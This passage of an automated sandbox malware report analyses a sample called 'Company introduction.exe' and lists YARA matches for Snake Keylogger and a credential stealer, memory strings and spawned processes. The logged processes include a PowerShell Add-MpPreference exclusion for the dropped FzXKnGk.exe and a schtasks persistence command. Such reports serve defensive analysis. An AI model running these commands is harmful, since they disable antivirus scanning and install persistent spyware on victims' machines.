                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F6CCA012_2_06F6CCA0
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F69C6D12_2_06F69C6D
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F6FC6812_2_06F6FC68
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F6FC5E12_2_06F6FC5E
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F6004012_2_06F60040
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F6F81012_2_06F6F810
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F6501812_2_06F65018
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F6000712_2_06F60007
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F6F80112_2_06F6F801
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F6DDFF12_2_06F6DDFF
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F6D9A812_2_06F6D9A8
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F6D99912_2_06F6D999
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F6D55012_2_06F6D550
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeCode function: 12_2_06F6D54012_2_06F6D540
                Source: Company introduction.exe, 00000000.00000002.1732379162.000000000352C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Company introduction.exe
                Source: Company introduction.exe, 00000000.00000002.1739887947.0000000008400000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs Company introduction.exe
                Source: Company introduction.exe, 00000000.00000002.1733796821.0000000004AD2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Company introduction.exe
                Source: Company introduction.exe, 00000000.00000002.1733796821.00000000042B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs Company introduction.exe
                Source: Company introduction.exe, 00000000.00000000.1680830386.0000000000E72000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRpQI.exe< vs Company introduction.exe
                Source: Company introduction.exe, 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Company introduction.exe
                Source: Company introduction.exe, 00000000.00000002.1730716466.000000000135E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Company introduction.exe
                Source: Company introduction.exe, 00000000.00000002.1740000811.00000000084B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Company introduction.exe
                Source: Company introduction.exe, 00000006.00000002.2937905341.0000000000443000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Company introduction.exe
                Source: Company introduction.exe, 00000006.00000002.2938374364.00000000010F7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Company introduction.exe
                Source: Company introduction.exeBinary or memory string: OriginalFilenameRpQI.exe< vs Company introduction.exe
                Source: Company introduction.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 7.2.FzXKnGk.exe.4405f58.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 7.2.FzXKnGk.exe.4405f58.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 7.2.FzXKnGk.exe.4405f58.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Company introduction.exe.4e9a600.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Company introduction.exe.4e9a600.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 7.2.FzXKnGk.exe.4448f78.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 7.2.FzXKnGk.exe.4448f78.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 7.2.FzXKnGk.exe.4448f78.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 7.2.FzXKnGk.exe.4448f78.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 7.2.FzXKnGk.exe.4448f78.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 7.2.FzXKnGk.exe.4448f78.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Company introduction.exe.4e9a600.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Company introduction.exe.4e575e0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Company introduction.exe.4e575e0.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Company introduction.exe.4e575e0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 7.2.FzXKnGk.exe.4405f58.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 7.2.FzXKnGk.exe.4405f58.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 7.2.FzXKnGk.exe.4405f58.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Company introduction.exe.4e9a600.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Company introduction.exe.4e9a600.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Company introduction.exe.4e9a600.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Company introduction.exe.4e575e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Company introduction.exe.4e575e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Company introduction.exe.4e575e0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: Company introduction.exe PID: 7452, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: FzXKnGk.exe PID: 7888, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: FzXKnGk.exe PID: 8144, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Company introduction.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: FzXKnGk.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@18/11@3/3
                Source: C:\Users\user\Desktop\Company introduction.exeFile created: C:\Users\user\AppData\Roaming\FzXKnGk.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeMutant created: \Sessions\1\BaseNamedObjects\HgocHLp
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8032:120:WilError_03
                Source: C:\Users\user\Desktop\Company introduction.exeFile created: C:\Users\user\AppData\Local\Temp\tmpE629.tmpJump to behavior
                Source: Company introduction.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Company introduction.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\Company introduction.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Company introduction.exeVirustotal: Detection: 29%
                Source: Company introduction.exeReversingLabs: Detection: 34%
                Source: C:\Users\user\Desktop\Company introduction.exeFile read: C:\Users\user\Desktop\Company introduction.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Company introduction.exe "C:\Users\user\Desktop\Company introduction.exe"
                Source: C:\Users\user\Desktop\Company introduction.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Company introduction.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpE629.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Company introduction.exeProcess created: C:\Users\user\Desktop\Company introduction.exe "C:\Users\user\Desktop\Company introduction.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\FzXKnGk.exe C:\Users\user\AppData\Roaming\FzXKnGk.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpEF32.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess created: C:\Users\user\AppData\Roaming\FzXKnGk.exe "C:\Users\user\AppData\Roaming\FzXKnGk.exe"
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess created: C:\Users\user\AppData\Roaming\FzXKnGk.exe "C:\Users\user\AppData\Roaming\FzXKnGk.exe"
                Source: C:\Users\user\Desktop\Company introduction.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpE629.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess created: C:\Users\user\Desktop\Company introduction.exe "C:\Users\user\Desktop\Company introduction.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpEF32.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess created: C:\Users\user\AppData\Roaming\FzXKnGk.exe "C:\Users\user\AppData\Roaming\FzXKnGk.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeProcess created: C:\Users\user\AppData\Roaming\FzXKnGk.exe "C:\Users\user\AppData\Roaming\FzXKnGk.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
